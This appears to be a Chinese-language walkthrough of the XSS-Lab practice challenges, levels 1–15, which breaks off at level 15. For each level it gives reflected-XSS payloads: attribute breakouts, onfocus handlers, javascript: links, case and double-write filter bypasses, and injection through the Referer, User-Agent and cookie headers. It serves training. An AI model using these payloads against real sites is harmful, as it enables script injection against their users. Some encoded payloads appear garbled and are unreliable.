XSS-Lab

这一道题都有20关我真服了

level 1

查看源码

不难发现test会在页面里回显出来 所以我们直接再url里修改name的值

<script>alert(1)</script>

level 2

这里我们继续查看源码

我们继续使用 <script>alert()</script>

这里发现特殊的符号被转义了

我们重新构造payload "> <script>alert()</script> <"就通过了

level 3

这里我们发现不只是<>被实体化了 ' 也被实体化了

所以这道题需要运用到onfocus

我们构造payload ' onfocus=javascript:alert() '

然后再点击输入框获取焦点就通过了

onfocus

onfocus 是一个事件处理器属性，当 HTML 页面中的某个元素获得焦点时，会触发与之关联的事件处理函数。这个事件主要用于表单元素（如 <input>、<textarea>、<select>）和可聚焦的元素（如 <a> 链接、按钮等）

level4

这道题是双引号闭合 我们构造payload " onfocus=javascript:alert() "

level 5

这道题不仅过滤了js标签 还过滤了onfocus 我们采用 a herf 标签法

构造payload

"> <a href=javascript:alert()>xxx</a> <"

构造好之后点击xss就好了

herf

href 是 HTML <a> 标签的属性，用于指定超链接的目标位置。它告诉浏览器当用户点击该链接时，应该跳转到哪里 href 可以指向网页、文件、电子邮件地址、电话号码，甚至是页面内的某个部分

level 6

这道题过滤了很多东西 但好像没过滤大小写 我们采用大小写绕过

构造payload "> <Script>alert()</Script><"

level 7

这里也是过滤了很多东西 我们采用双写绕过

构造payload

"> <a hrehreff=javasscriptcript:alert()>x</a> <"

level 8

这里需要知道herf可以自动unicode解码

制造payload javascript:alert()

编码过后

javascript:alert()

level 9

这道题过滤了 http://

制造payload javascript>alert()

这里我们需要经过html编码

javascript:alert()/* http:// */

level 10

没有输入的地方 我们查看源码

关键字

" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> &#106;

几乎都被实体化了 要使用get传参 这里还是要使用onfocus事件 因为没有输入框所以要加入type="text"

制造payload ?t_sort=" onfocus=javascript:alert() type="text

level 11

这里和上一道题差不多 就是需要用到refere头 传参

构造payload Referer: " onfocus=javascript:alert() type="text

Referer头的定义

Referer头是HTTP请求中的一个标头字段，用于指示当前请求的来源页面。通常由HTTP客户端（如浏览器）发送给服务器，帮助服务器了解用户是从哪个页面跳转而来的

level 12

这里是修改ua的参数完成注入 " onfocus=javascript:alert() type="text

level 13

名字为cook 考虑cookie 制造payload " onfocus=alert() type="text

level 14

这道题网站啥也没有 看下源码吧

level 15

我的出了点问题 第十五关 没跳转成功 下次再做吧